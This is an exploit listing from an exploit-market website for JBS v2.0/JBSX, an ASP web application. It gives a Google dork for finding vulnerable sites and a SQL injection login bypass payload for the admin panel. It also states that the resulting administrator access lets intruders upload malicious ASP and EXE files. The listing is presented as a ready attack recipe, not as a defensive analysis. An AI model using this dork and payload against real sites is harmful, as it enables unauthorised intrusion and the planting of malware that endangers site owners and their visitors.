[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload

Author
blackenedsecurity
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9994
Category
web applications
Date add
17-11-2009
Platform
unsorted
=====================================================================================
JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability
=====================================================================================

# Administration panel bypass and Malicious File Upload Vulnerability
# JBS v2.0 JBSX and other Jiro's Products
# Google Dork: "inurl:/files/redirect.asp"
 
 
Go to url files/login.asp
 
admin 'or' '='   
password 'or' '='
 
H4ckers may upload malicious files by using upload panel as they have administrator acces
they are able to change settings and upload asp and exe files.



#  0day.today [2024-09-28]  #